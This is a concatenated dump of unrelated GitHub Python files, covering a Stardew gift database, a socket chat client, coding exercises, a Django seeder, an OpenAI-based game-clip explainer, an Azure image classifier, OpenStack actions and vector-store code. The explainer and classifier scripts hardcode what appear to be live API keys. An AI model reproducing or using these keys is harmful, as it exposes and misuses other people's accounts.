x.reaction) for x in reactions]\n self.write_list(statement, args)\n\n def write_items(self, items):\n statement = \"INSERT INTO {} VALUES(?, ?, ?)\" \\\n .format(self.gift_table_name)\n args = [(x.name, x.source, x.season) for x in items]\n self.write_list(statement, args)\n\n def write_item_attributes(self, items):\n # conflict set to handle catfish season corner case\n statement = \"\"\"INSERT INTO {} VALUES(?, ?, ?) \n ON CONFLICT DO NOTHING\"\"\" \\\n .format(self.item_attributes_table_name)\n\n args = []\n for item in items:\n for attribute in item.attributes:\n for value in item.attributes[attribute]:\n arg = (item.name, attribute, value)\n args.append(arg)\n self.write_list(statement, args)\n\n def write_list(self, statement, args):\n \"\"\" Executes the given statement with every argument in \n the args list. \"\"\"\n\n for arg in args:\n print(arg)\n self.cursor.execute(statement, arg)\n\n def get_cursor(self):\n self.conn = sqlite3.connect(f\"{self.database_path}.db\")\n return self.conn.cursor()\n\n def commit(self):\n self.conn.commit()\n self.conn.close()\n\n def build_items_db(self, cursor):\n cursor.execute(\"\"\"CREATE TABLE if not exists {}(\n name TEXT PRIMARY KEY NOT NULL, \n source TEXT NOT NULL,\n season TEXT NOT NULL)\"\"\" \\\n .format(self.item_table_name))\n\n def build_gifts_db(self, cursor):\n cursor.execute(\"\"\"CREATE TABLE if not exists {}(\n villager TEXT NOT NULL, \n item TEXT NOT NULL, \n reaction TEXT NOT NULL,\n PRIMARY KEY(villager, item))\"\"\" \\\n .format(self.gift_table_name))\n\n def build_item_attributes_db(self, cursor):\n cursor.execute(\"\"\"CREATE TABLE if not exists {}(\n item TEXT NOT NULL, \n attribute TEXT NOT NULL,\n value TEXT NOT NULL,\n PRIMARY KEY(item, attribute, value))\"\"\" \\\n .format(self.item_attributes_table_name))\n\n def build_all(self, cursor):\n self.build_item_attributes_db(cursor)\n self.build_gifts_db(cursor)\n","repo_name":"edmanf/StardewGifts","sub_path":"StardewGifts/SVGDatabase.py","file_name":"SVGDatabase.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"20241455571","text":"import threading\r\nimport socket\r\nimport pickle\r\n\r\nclass Client:\r\n nama = input(str('masukkan username'))\r\n pw = input(str('masukkan pasword'))\r\n pickle_out=open(\"Serialize\",\"wb\")\r\n pickle.dump(nama,pickle_out)\r\n pickle.dump(pw, pickle_out)\r\n\r\n pickle_out.close()\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n host = socket.gethostname()\r\n port = 59000\r\n client.connect((host, port))\r\nobj=Client()\r\n\r\ndef clien_menerima():\r\n while True:\r\n try:\r\n message = obj.client.recv(5024).decode('utf-8')\r\n if message == 'nama?' and 'pw?':\r\n obj.client.send(obj.nama.encode('utf-8'))\r\n obj.client.send(obj.pw.encode('utf-8'))\r\n else:\r\n print(message)\r\n #pickle_out = message\r\n pickle_out = open(\"Serialize\",\"wb\")\r\n #example_dict = pickle.load((pickle_in))\r\n pickle.dump(message,pickle_out)\r\n pickle_out.close()\r\n except:\r\n print('error')\r\n obj.client.close()\r\n break\r\n\r\n\r\n\r\ndef client_mengirim():\r\n while True:\r\n\r\n menginput=input(\"\")\r\n message = f'{obj.nama}:{menginput}'\r\n #pickle_out=open(\"Serialize\",\"wb\")\r\n #pickle.dump(message,pickle_out)\r\n obj.client.send(message.encode())\r\n #pickle_out.close()\r\ndef THREAD():\r\n receive_Thread = threading.Thread(target = clien_menerima)\r\n receive_Thread.start()\r\n\r\n send_Thread = threading.Thread(target=client_mengirim)\r\n send_Thread.start()\r\n\r\nTHREAD()\r\n","repo_name":"ImamBiladi27/TCP_Repilcation","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"29698850151","text":"print('Sequência de FIBONACC')\nprint('-'*100)\nnum = int(input('Quantos termos mostrar?'))\nt1 = 0\nt2 = 1\nprint('{} {}'.format(t1, t2), end=' ')\ncont = 3\nwhile cont <= num:\n t3 = t1+t2\n print('{}'.format(t3), end=' ')\n t1 = t2\n t2 = t3\n cont += 1\nprint('FIM')","repo_name":"Vsvilella/EX-python","sub_path":"desafio63.py","file_name":"desafio63.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27485146746","text":"def countLetters(string):\n d = {}\n final = \"\"\n for x in range(0, len(string)):\n if string[x] not in d.keys():\n d[string[x]] = 1\n elif string[x] in d.keys():\n d[string[x]] += 1\n for key, value in sorted(d.iteritems()):\n final += key + str(value)\n return final\n\nprint(countLetters(\"AAAABBBCCDE\"))\n","repo_name":"yevgen93/python","sub_path":"algorithms/string_traverse.py","file_name":"string_traverse.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"30911157644","text":"\nimport unittest\n\n\ndef trim(s, c=\" \"):\n i = 0\n for k in range(0, len(s)):\n i = k\n if s[k] != c:\n if s[k] == \".\":\n i -= 1\n break\n j = len(s)\n for k in range(len(s), 0, -1):\n j = k\n if s[k-1] != c:\n break\n return s[i:j]\n\n\nclass Solution:\n def isValid(self, S, i, j):\n s = S[i:j+1]\n if len(s) > 1 and float(s) == 0:\n return False\n return True\n\n def isValid2(self, e):\n e2 = float(e)\n if e2 == int(e2):\n return len(str(int(e2))) == len(e)\n else:\n\n return len(trim(e, \"0\")) == len(e)\n\n def gen(self, S, i, j):\n s = S[i:j+1]\n r = []\n if self.isValid2(s):\n r.append(s)\n for k in range(1, len(s)):\n e = s[0:k] + \".\" + s[k:]\n # print(e, self.isValid2(e))\n if self.isValid2(e):\n r.append(e)\n return r\n\n def ambiguousCoordinates(self, S):\n \"\"\"\n :type S: str\n :rtype: List[str]\n \"\"\"\n S = S[1:-1]\n r = []\n for i in range(0, len(S) - 1):\n if self.isValid(S, 0, i) and self.isValid(S, i+1, len(S) - 1):\n left = self.gen(S, 0, i)\n right = self.gen(S, i+1, len(S) - 1)\n # print(\"left\", left)\n # print(\"right\", right)\n for s1 in left:\n for s2 in right:\n r.append(\"(%s, %s)\" % (s1, s2))\n\n # print(r)\n return r\n\n\nclass TestSolution(unittest.TestCase):\n def test_trim(self):\n self.assertEqual(trim(\" 1234\"), \"1234\")\n self.assertEqual(trim(\"1234 \"), \"1234\")\n self.assertEqual(trim(\" 1234 \"), \"1234\")\n self.assertEqual(trim(\"xxx1234xxx\", \"x\"), \"1234\")\n\n def test_gen(self):\n s = Solution()\n self.assertListEqual(s.gen(\"12\", 0, 1), [\"12\", \"1.2\"])\n self.assertListEqual(s.gen(\"100\", 0, 2), [\"100\"])\n self.assertListEqual(s.gen(\"001\", 0, 2), [\"0.01\"])\n self.assertListEqual(s.gen(\"0\", 0, 0), [\"0\"])\n self.assertListEqual(s.gen(\"000001\", 0, 5), [\"0.00001\"])\n\n def test_ambiguousCoordinates(self):\n s = Solution()\n l = s.ambiguousCoordinates(\"(123)\")\n r = [\"(1, 23)\", \"(12, 3)\", \"(1.2, 3)\", \"(1, 2.3)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n l = s.ambiguousCoordinates(\"(00011)\")\n r = [\"(0.001, 1)\", \"(0, 0.011)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n l = s.ambiguousCoordinates(\"(0123)\")\n r = [\"(0, 123)\", \"(0, 12.3)\", \"(0, 1.23)\",\n \"(0.1, 23)\", \"(0.1, 2.3)\", \"(0.12, 3)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n l = s.ambiguousCoordinates(\"(100)\")\n r = [\"(10, 0)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n l = s.ambiguousCoordinates(\"(0000001)\")\n r = [\"(0, 0.00001)\"]\n l.sort(), r.sort()\n self.assertListEqual(l, r)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"pipi32167/LeetCode","sub_path":"py/816.py","file_name":"816.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"22576012414","text":"# imports\nfrom django_seed import Seed\nfrom faker import Faker\nimport random\n\nfrom django.utils import timezone\nfrom django.core import management\nfrom django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\n\nfrom distance import models as distance_models\nfrom accounts import models as accounts_models\n\n# End: imports -----------------------------------------------------------------\n\n# OBS: seed() on instance was depricated for Faker module.\n# Manually edited django-seed module __init__.py on line 35 from seed to seed_instance\n\n# Settings:\nUser = get_user_model()\n\nclass Command(BaseCommand):\n\n def i(self, x, y):\n return random.randint(x, y)\n\n def fake_rgba(self, x=0, y=255):\n r, g, b, a = self.i(x,y), self.i(x,y), self.i(x,y), random.choice([0.6, 0.7, 0.8, 0.9, 1])\n return f\"rgba({r},{g},{b},{a})\"\n\n def f(self):\n seeder = Seed.seeder()\n\n seeder.faker.seed_instance(1234)\n\n seeder.add_entity(accounts_models.Department, 6, {\n 'name': lambda x: seeder.faker.word(),\n 'short_name': lambda x: seeder.faker.word(),\n })\n seeder.add_entity(User, 20, {\n # 'department': lambda x: seeder.faker.word(),\n })\n seeder.add_entity(distance_models.Workout, 200, {\n 'distance': lambda x: round(random.uniform(0, 20), 1),\n 'type': lambda x: random.randint(0, 6),\n 'comment': lambda x: seeder.faker.sentence(nb_words=2),\n 'date': lambda x: seeder.faker.date_this_year(after_today=False),\n })\n\n seeder.execute()\n\n\n\n def handle(self, *args, **options):\n self.f()\n # End of handle\n","repo_name":"emilte/idretten-oerland","sub_path":"main/management/commands/myseed.py","file_name":"myseed.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"35918888543","text":"import base64\n\nimport openai\nimport json\nimport os\nfrom gtts import gTTS\nfrom app.services.explanation_ai.primary_model.distance import distance\nfrom app.services.explanation_ai.primary_model.favor_unfavor import favor\nfrom app.services.explanation_ai.primary_model.if_use_spell_well import if_use_spell_well\nfrom app.services.explanation_ai.primary_model.spell1 import spell1\nfrom app.services.explanation_ai.primary_model.spell2 import spell2\nfrom app.services.explanation_ai.primary_model.what_to_what import what_to_what\nfrom moviepy.editor import VideoFileClip\n\n\ndef final(VIDEO_PATH):\n video = VIDEO_PATH.split(\"/\")[3].split(\".\")[0]\n GIF_PATH = f\"app/services/explanation_ai/gif/{video}.gif\"\n\n try:\n os.remove(GIF_PATH)\n except OSError:\n pass\n\n\n # Set up the OpenAI API client\n openai.api_key = \"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\"\n\n b_proto1 = spell1(VIDEO_PATH)\n b_proto2 = spell2(VIDEO_PATH)\n a_proto = favor(VIDEO_PATH)\n\n if b_proto1 == \"don't use\" and b_proto2 == \"don't use\":\n b = \"0\"\n elif b_proto1 == \"use\" and b_proto2 == \"don't use\":\n b = \"1\"\n elif b_proto1 == \"don't use\" and b_proto2 == \"use\":\n b = \"1\"\n else:\n b = \"2\"\n\n a = f\"팀의 파워는 {a_proto}\"\n b = f\"플레이어는 {b}개의 주문을 사용했다.\"\n c = f\"플레이어는 적과의 거리조절을 {distance(VIDEO_PATH)}\"\n d = f\"전투는 {what_to_what(VIDEO_PATH)} 싸움이다.\"\n e = f\"{if_use_spell_well(VIDEO_PATH)}\"\n\n\n if b_proto1 == \"don't have\" and b_proto2 == \"don't have\":\n e = \"스펠이 없었다.\"\n\n # Define the list of sentences that describe the situation\n situation = [\n \"플레이어는 리그 오브 레전드를 플레이 중이다.\",\n \"플레이어는 사망했다\",\n a,\n b,\n c,\n d,\n e\n ]\n # Concatenate the sentences together to form a single string\n input_text = \" \".join(situation)\n print(input_text)\n # Generate a sentence that describes the situation using the GPT model\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=input_text,\n max_tokens=300\n )\n\n # Extract the generated sentence from the API response\n output_text = response.choices[0].text.strip()\n print(f\"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{output_text}\")\n tts = gTTS(text=output_text, lang='ko')\n audio_output_file = f\"app/services/explanation_ai/audio/{video}.mp3\"\n if os.path.exists(audio_output_file):\n os.remove(audio_output_file)\n tts.save(audio_output_file)\n with open(audio_output_file, \"rb\") as audio_file:\n audio_data = audio_file.read()\n\n a = VideoFileClip(VIDEO_PATH).resize(height=240).set_fps(5)\n a.write_gif(GIF_PATH)\n with open(GIF_PATH, \"rb\") as gif_file:\n gif_base64 = base64.b64encode(gif_file.read()).decode('utf-8')\n\n output = json.dumps({\"output_text\": output_text, \"tts\": audio_data.decode('latin1'), \"gif\": gif_base64})\n\n print(output)\n return output\n\n","repo_name":"32192442sangho/TeamProject","sub_path":"app/services/explanation_ai/final/explanation.py","file_name":"explanation.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42375014978","text":"from azure.cognitiveservices.vision.customvision.prediction import CustomVisionPredictionClient\nimport json\nimport glob\nfiles = []\ndata = []\nfiles = ['data.json']\n\n\nprediction_key = \"b07c005ad5ad46ec937dcdd08486ba58\"\nENDPOINT = \"https://southcentralus.api.cognitive.microsoft.com/\"\nProject_id = \"253ff62d-4245-486a-b41e-921e94379e3b\"\npublish_iteration_name = \"kesha123\"\n\npredictor = CustomVisionPredictionClient(prediction_key, endpoint=ENDPOINT)\n\nfor file in glob.glob(\"C:/Users/Lalit Ak Radadiya/Desktop/Data/test/*\"):\n base_image_url = file\n with open(base_image_url, \"rb\") as image_contents:\n results = predictor.classify_image(\n Project_id, publish_iteration_name, image_contents.read())\n\n # Display the results.\n for prediction in results.predictions:\n print(\"\\t\" + prediction.tag_name)\n t = prediction.tag_name\n data.append({\n 'name': t,\n 'price': \"20rs\"\n })\n break\n\n # end with\n with open('data.json', 'w+') as outfile:\n json.dump(data, outfile)\n\n # end with\n files = ['data.json']\n","repo_name":"LalitAkRadadiya/RSU-demo","sub_path":"Multi.py","file_name":"Multi.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3215151768","text":"from typing import Dict, Callable, List\nfrom openstack_api.openstack_flavor import OpenstackFlavor\nfrom st2common.runners.base_action import Action\n\n\nclass FlavorActions(Action):\n def __init__(self, *args, config: Dict = None, **kwargs):\n \"\"\"constructor class\"\"\"\n super().__init__(*args, config=config, **kwargs)\n self._flavor_api: OpenstackFlavor = config.get(\n \"openstack_flavor_api\", OpenstackFlavor()\n )\n\n def run(self, submodule: str, **kwargs):\n \"\"\"\n Dynamically dispatches to the method wanted\n \"\"\"\n func: Callable = getattr(self, submodule)\n return func(**kwargs)\n\n def list_missing_flavors(\n self,\n source_cloud: str,\n dest_cloud: str,\n ) -> List[str]:\n \"\"\"\n Calls missing_flavors from _flavor_api to get a list of flavors that are\n in the source cloud but are missing from the destination cloud.\n :param source_cloud: Cloud account for source cloud\n :param dest_cloud: Cloud account for destination cloud\n :returns: List of the names of missing flavors or empty List if no flavors are missing\n \"\"\"\n return self._flavor_api.migrate_flavors(\n source_cloud=source_cloud,\n dest_cloud=dest_cloud,\n )\n","repo_name":"stfc/st2-cloud-pack","sub_path":"actions/src/flavor_actions.py","file_name":"flavor_actions.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3926839688","text":"\"\"\"\"\nDay7\n\"\"\"\n\nimport re\nimport sys\n\n\nPENALTY = 60\nNUM_WORKERS = 5\n\nclass Worker(object):\n def __init__(self, node):\n self.node = node\n self.time = Worker.time_to_complete(node)\n\n @staticmethod\n def time_to_complete(char):\n return int(char.encode('hex'), 16) - 64 + PENALTY\n\n def tick(self):\n self.time -= 1\n return self.time\n\n\ndef main():\n if len(sys.argv) > 1:\n with open(sys.argv[1], 'r') as s:\n values = s.readlines()\n else:\n values = sys.stdin.readlines()\n\n graph = {}\n blocks = {}\n nodes = set()\n\n for value in values:\n match = re.match(r'Step (\\w) must be finished before step (\\w) can begin\\.', value)\n\n val_first = match.groups()[0]\n val_second = match.groups()[1]\n\n graph.setdefault(val_first, []).append(val_second)\n blocks.setdefault(val_second, []).append(val_first)\n\n\n nodes.add(val_first)\n nodes.add(val_second)\n\n # for k,v in graph.iteritems():\n # print(k, time_to_complete(k), v)\n # print(nodes)\n #\n # for k,v in blocks.iteritems():\n # print(k, v)\n # print(nodes)\n\n # find root\n roots = sorted(nodes - set(blocks.keys()))\n walked = set()\n\n def is_runnable(node):\n blocking = blocks.get(node, [])\n return not any([x in nodes for x in blocking])\n\n queue = roots\n workers = []\n ticks = 0\n while queue or len(workers) > 0:\n runnable = sorted(filter(is_runnable, queue ))\n\n while runnable and len(workers) < NUM_WORKERS:\n node = runnable.pop(0)\n queue.remove(node)\n workers.append(Worker(node))\n\n next_nodes = []\n workers_done = []\n for worker in workers:\n worker.tick()\n if worker.time == 0:\n # Worker done!\n sys.stdout.write(worker.node)\n walked.add(worker.node)\n nodes.remove(worker.node)\n next_nodes.extend(graph.get(worker.node, []))\n workers_done.append(worker)\n\n for worker in workers_done:\n workers.remove(worker)\n\n queue.extend(next_nodes)\n queue = sorted(set(queue) - walked)\n\n ticks += 1\n\n print('')\n print(ticks)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dahallgren/adventOfCode2018","sub_path":"7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28164721451","text":"\"\"\"Interface for storing vectors.\"\"\"\n\nimport abc\nimport os\nimport pickle\nfrom typing import Iterable, Optional, Sequence, Type, cast\n\nimport numpy as np\n\nfrom ..schema import SpanVector, VectorKey\nfrom ..utils import open_file\n\n\nclass VectorStore(abc.ABC):\n \"\"\"Interface for storing and retrieving vectors.\"\"\"\n\n # The global name of the vector store.\n name: str\n\n @abc.abstractmethod\n def save(self, base_path: str) -> None:\n \"\"\"Save the store to disk.\"\"\"\n pass\n\n @abc.abstractmethod\n def load(self, base_path: str) -> None:\n \"\"\"Load the store from disk.\"\"\"\n pass\n\n @abc.abstractmethod\n def size(self) -> int:\n \"\"\"Return the number of vectors in the store.\"\"\"\n pass\n\n @abc.abstractmethod\n def add(self, keys: list[VectorKey], embeddings: np.ndarray) -> None:\n \"\"\"Add or edit the given keyed embeddings to the store.\n\n If the keys already exist they will be overwritten, acting as an \"upsert\".\n\n Args:\n keys: The keys to add the embeddings for.\n embeddings: The embeddings to add. This should be a 2D matrix with the same length as keys.\n \"\"\"\n pass\n\n @abc.abstractmethod\n def get(self, keys: Optional[Iterable[VectorKey]] = None) -> np.ndarray:\n \"\"\"Return the embeddings for given keys.\n\n Args:\n keys: The keys to return the embeddings for. If None, return all embeddings.\n\n Returns:\n The embeddings for the given keys.\n \"\"\"\n pass\n\n def topk(\n self, query: np.ndarray, k: int, keys: Optional[Iterable[VectorKey]] = None\n ) -> list[tuple[VectorKey, float]]:\n \"\"\"Return the top k most similar vectors.\n\n Args:\n query: The query vector.\n k: The number of results to return.\n keys: Optional keys to restrict the search to.\n\n Returns:\n A list of (key, score) tuples.\n \"\"\"\n raise NotImplementedError\n\n\nPathKey = VectorKey\n\n_SPANS_PICKLE_NAME = 'spans.pkl'\n\n\nclass VectorDBIndex:\n \"\"\"Stores and retrives span vectors.\n\n This wraps a regular vector store by adding a mapping from path keys, such as (rowid1, 0),\n to span keys, such as (rowid1, 0, 0), which denotes the first span in the (rowid1, 0) document.\n \"\"\"\n\n def __init__(self, vector_store: str) -> None:\n self._vector_store: VectorStore = get_vector_store_cls(vector_store)()\n # Map a path key to spans for that path.\n self._id_to_spans: dict[PathKey, list[tuple[int, int]]] = {}\n self._rowid_to_path_keys: dict[str, list[PathKey]] = {}\n\n def load(self, base_path: str) -> None:\n \"\"\"Load the vector index from disk.\"\"\"\n assert not self._id_to_spans, 'Cannot load into a non-empty index.'\n with open_file(os.path.join(base_path, _SPANS_PICKLE_NAME), 'rb') as f:\n all_spans: list[tuple[PathKey, list[tuple[int, int]]]] = pickle.load(f)\n self._id_to_spans.update(all_spans)\n for path_key, _ in all_spans:\n rowid = cast(str, path_key[0])\n self._rowid_to_path_keys.setdefault(rowid, []).append(path_key)\n self._vector_store.load(os.path.join(base_path, self._vector_store.name))\n\n def save(self, base_path: str) -> None:\n \"\"\"Save the vector index to disk.\"\"\"\n assert self._id_to_spans, 'Cannot save an empty index.'\n with open_file(os.path.join(base_path, _SPANS_PICKLE_NAME), 'wb') as f:\n pickle.dump(list(self._id_to_spans.items()), f)\n self._vector_store.save(os.path.join(base_path, self._vector_store.name))\n\n def add(\n self, all_spans: Sequence[tuple[PathKey, list[tuple[int, int]]]], embeddings: np.ndarray\n ) -> None:\n \"\"\"Add the given spans and embeddings.\n\n Args:\n all_spans: The spans to initialize the index with.\n embeddings: The embeddings to initialize the index with.\n \"\"\"\n vector_keys = [(*path_key, i) for path_key, spans in all_spans for i in range(len(spans))]\n assert len(vector_keys) == len(\n embeddings\n ), f'Number of spans ({len(vector_keys)}) and embeddings ({len(embeddings)}) must match.'\n\n self._id_to_spans.update(all_spans)\n for path_key, _ in all_spans:\n rowid = cast(str, path_key[0])\n self._rowid_to_path_keys.setdefault(rowid, []).append(path_key)\n\n self._vector_store.add(vector_keys, embeddings)\n\n def get_vector_store(self) -> VectorStore:\n \"\"\"Return the underlying vector store.\"\"\"\n return self._vector_store\n\n def get(self, keys: Iterable[PathKey]) -> Iterable[list[SpanVector]]:\n \"\"\"Return the spans with vectors for each key in `keys`.\n\n Args:\n keys: The keys to return the vectors for.\n\n Returns:\n The span vectors for the given keys.\n \"\"\"\n all_spans: list[list[tuple[int, int]]] = []\n all_vector_keys: list[list[VectorKey]] = []\n for path_key in keys:\n spans = self._id_to_spans.get(path_key, [])\n all_spans.append(spans)\n all_vector_keys.append([(*path_key, i) for i in range(len(spans))])\n\n offset = 0\n flat_vector_keys = [key for vector_keys in all_vector_keys for key in (vector_keys or [])]\n all_vectors = self._vector_store.get(flat_vector_keys)\n for spans in all_spans:\n vectors = all_vectors[offset : offset + len(spans)]\n yield [{'span': span, 'vector': vector} for span, vector in zip(spans, vectors)]\n offset += len(spans)\n\n def topk(\n self, query: np.ndarray, k: int, rowids: Optional[Iterable[str]] = None\n ) -> list[tuple[PathKey, float]]:\n \"\"\"Return the top k most similar vectors.\n\n Args:\n query: The query vector.\n k: The number of results to return.\n rowids: Optional row ids to restrict the search to.\n\n Returns:\n A list of (rowid, score) tuples.\n \"\"\"\n total_num_span_keys = self._vector_store.size()\n k = min(k, total_num_span_keys)\n span_keys: Optional[list[VectorKey]] = None\n if rowids is not None:\n span_keys = []\n for rowid in rowids:\n path_keys = self._rowid_to_path_keys.get(rowid)\n if path_keys is None:\n continue\n\n span_keys.extend(\n [\n (*path_key, i)\n for path_key in path_keys\n for i in range(len(self._id_to_spans[path_key]))\n ]\n )\n k = min(k, len(span_keys))\n span_k = k\n path_key_scores: dict[PathKey, float] = {}\n seen_rowids: dict[str, bool] = {}\n while (\n len(seen_rowids) < k\n and span_k <= total_num_span_keys\n and (not span_keys or span_k <= len(span_keys))\n ):\n span_k += k\n vector_key_scores = self._vector_store.topk(query, span_k, span_keys)\n for (*path_key_list, _), score in vector_key_scores:\n path_key = tuple(path_key_list)\n if path_key not in path_key_scores:\n path_key_scores[path_key] = score\n rowid = cast(str, path_key[0])\n if rowid not in seen_rowids:\n seen_rowids[rowid] = True\n\n top_rowids = set(list(seen_rowids.keys())[:k])\n top_path_keys = [(key, s) for (key, s) in path_key_scores.items() if key[0] in top_rowids]\n return list(top_path_keys)\n\n\nVECTOR_STORE_REGISTRY: dict[str, Type[VectorStore]] = {}\n\n\ndef register_vector_store(vector_store_cls: Type[VectorStore]) -> None:\n \"\"\"Register a vector store in the global registry.\"\"\"\n if vector_store_cls.name in VECTOR_STORE_REGISTRY:\n raise ValueError(f'Vector store \"{vector_store_cls.name}\" has already been registered!')\n\n VECTOR_STORE_REGISTRY[vector_store_cls.name] = vector_store_cls\n\n\ndef get_vector_store_cls(vector_store_name: str) -> Type[VectorStore]:\n \"\"\"Return a registered vector store given the name in the registry.\"\"\"\n return VECTOR_STORE_REGISTRY[vector_store_name]\n\n\ndef clear_vector_store_registry() -> None:\n \"\"\"Clear the vector store registry.\"\"\"\n VECTOR_STORE_REGISTRY.clear()\n","repo_name":"lilacai/lilac","sub_path":"lilac/embeddings/vector_store.py","file_name":"vector_store.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","stars":312,"dataset":"github-code","pt":"71"} +{"seq_id":"33628240566","text":"# 2635 수 이어가기 : 맞왜틀 \nn = int(input())\nmax_nl = [] # 뽑은 수 저장 리스트\nmax_len = 0 # 최대 개수의 수\n\n# 1부터 입력된 양수까지 반복\nfor j in range(1, n+1):\n nl = [n, j] # 임시 리스트\n i = 0\n \n while True:\n a = nl[i] - nl[i+1]\n i+=1\n # 음의 정수가 만들어지면 중단\n if a < 0:\n break\n # 첫째 수 - 둘째 수 저장\n nl.append(a)\n \n # 새로운 임시 리스트가 기존에 저장된 리스트의 원소 수 보다 많으면 교체\n if max_len < len(nl):\n max_len = len(nl)\n max_nl = nl[:]\n\nprint(max_len)\nprint(*max_nl)\n\n# 다른사람의 답안...\n# first_num = int(input())\n# # second_num = first_num // 2 + 1 \n# # # 절반 이하로 2번째 수를 정하게 되면 4번째 수에서 끝나기 때문 -> 틀린 아이디어 같음.\n# len_result = 0\n# result = []\n\n# # for i in range(first_num-1, second_num, -1):\n# for i in range(first_num+1):\n# result_list = [first_num, i]\n# j = 0\n# while True:\n# last_num = result_list[j] - result_list[j+1]\n# j += 1\n# if last_num < 0:\n# break\n# result_list.append(last_num)\n# if len_result < len(result_list):\n# len_result = len(result_list)\n# result = result_list[:]\n\n# print(len_result)\n# final_result = [str(result[i]) for i in range(len(result))]\n# print(' '.join(final_result))","repo_name":"White-Asher/algorithm","sub_path":"Coding-Test-Python/Baekjoon_OJ/BOJ_SWEA-IM/2635[S5] 수 이어가기.py","file_name":"2635[S5] 수 이어가기.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14918505270","text":"from xivo_bus.resources.endpoint_iax.event import (\n IAXEndpointCreatedEvent,\n IAXEndpointDeletedEvent,\n IAXEndpointEditedEvent,\n)\n\nfrom wazo_confd import bus, sysconfd\n\nfrom .schema import IAXSchema\n\nENDPOINT_IAX_FIELDS = [\n 'id',\n 'tenant_uuid',\n 'name',\n 'trunk.id',\n]\n\n\nclass IAXEndpointNotifier:\n def __init__(self, sysconfd, bus):\n self.sysconfd = sysconfd\n self.bus = bus\n\n def send_sysconfd_handlers(self):\n handlers = {'ipbx': ['iax2 reload']}\n self.sysconfd.exec_request_handlers(handlers)\n\n def created(self, iax):\n iax_serialized = IAXSchema(only=ENDPOINT_IAX_FIELDS).dump(iax)\n event = IAXEndpointCreatedEvent(iax_serialized, iax.tenant_uuid)\n self.bus.queue_event(event)\n\n def edited(self, iax):\n self.send_sysconfd_handlers()\n iax_serialized = IAXSchema(only=ENDPOINT_IAX_FIELDS).dump(iax)\n event = IAXEndpointEditedEvent(iax_serialized, iax.tenant_uuid)\n self.bus.queue_event(event)\n\n def deleted(self, iax):\n self.send_sysconfd_handlers()\n iax_serialized = IAXSchema(only=ENDPOINT_IAX_FIELDS).dump(iax)\n event = IAXEndpointDeletedEvent(iax_serialized, iax.tenant_uuid)\n self.bus.queue_event(event)\n\n\ndef build_notifier():\n return IAXEndpointNotifier(sysconfd, bus)\n","repo_name":"wazo-platform/wazo-confd","sub_path":"wazo_confd/plugins/endpoint_iax/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"39478371960","text":"from src.library import *\n\n\nclass TransformerBatchNormEncoderLayer(nn.modules.Module):\n \"\"\"Transformer encoder with BatchNorm instead of LayerNorm.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multihead attention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of intermediate layer, relu or gelu (default=relu).\n \"\"\"\n\n def __init__(\n self,\n d_model: int,\n nhead: int,\n dim_feedforward: int = 2048,\n dropout: float = 0.1,\n activation: str = \"relu\",\n ):\n super(TransformerBatchNormEncoderLayer, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm1 = BatchNorm1d(\n d_model, eps=1e-5\n ) # normalizes each feature across batch samples and time steps\n self.norm2 = BatchNorm1d(d_model, eps=1e-5)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n\n self.activation = get_activation_fn(activation)\n\n def __setstate__(self, state):\n if \"activation\" not in state:\n state[\"activation\"] = F.relu\n super(TransformerBatchNormEncoderLayer, self).__setstate__(state)\n\n def forward(\n self,\n src: Tensor,\n src_mask: Optional[Tensor] = None,\n src_key_padding_mask: Optional[Tensor] = None,\n is_causal: bool = False,\n ) -> Tensor:\n r\"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer.\n src_mask: the mask for the src sequence.\n 